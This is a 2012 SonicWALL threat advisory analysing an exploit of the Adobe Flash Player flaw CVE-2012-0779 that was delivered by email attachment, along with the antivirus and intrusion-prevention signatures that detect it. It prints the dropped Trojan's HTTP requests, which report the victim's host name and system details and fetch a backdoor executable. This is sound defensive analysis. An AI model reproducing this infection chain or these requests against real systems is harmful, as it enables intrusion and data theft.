New Adobe Flash Player exploit (May 4, 2012)


SonicWALL Threats Research team observed a new Flash exploit in the wild targeting the recently patched Adobe Flash Player vulnerability – CVE-2012-0779.

The exploit arrives as an e-mail attachment and if the user opens the document it will attempt to exploit the newly patched Adobe Flash Player vulnerability. Upon successful run, it will drop and run additional malware on the victim machine.

The specially crafted document will invoke Microsoft Internet Explorer in the background to download a malicious SWF exploit file from a remote compromised server located in Korea:

The HTTP request to the remote server contains information about the compromised host name and the offset at which the malicious executable is embedded inside the document. The response contains a compressed SWF exploit file which has an ActionScript payload encrypted via DoSWF.

A quick look at the SWF exploit file metadata shows the User account & Author website information used to encrypt this file:

The embedded executable file inside the document is XOR’ed using 0x85 key and is a Downloader Trojan:

The Downloader Trojan was dropped and executed upon successful exploit run. It registers the infection on a remote site and downloads a Backdoor Trojan.

     GET /register/log.asp?isnew=-1&LocalInfo=(Operating System Information)&szHostName=(HOSTNAME)&tmp3=tmp3 Host:  GET /Include/lib/ps.exe [ Detected as PcClient.NGO_3 (Trojan) ] Host: 

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: CVE-2012-0779.dc (Exploit)
  • GAV: CVE-2012-0779#swf (Exploit)
  • GAV: Mdrop.DOI (Trojan)
  • GAV: PcClient.NGO_3 (Trojan)

SonicWALL Intrusion Prevention system provides protection against this threat via the following signatures:

  • 7772 – Adobe Flash Player Object Confusion Exploit 1
  • 7773 – Adobe Flash Player Object Confusion Exploit 2
Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.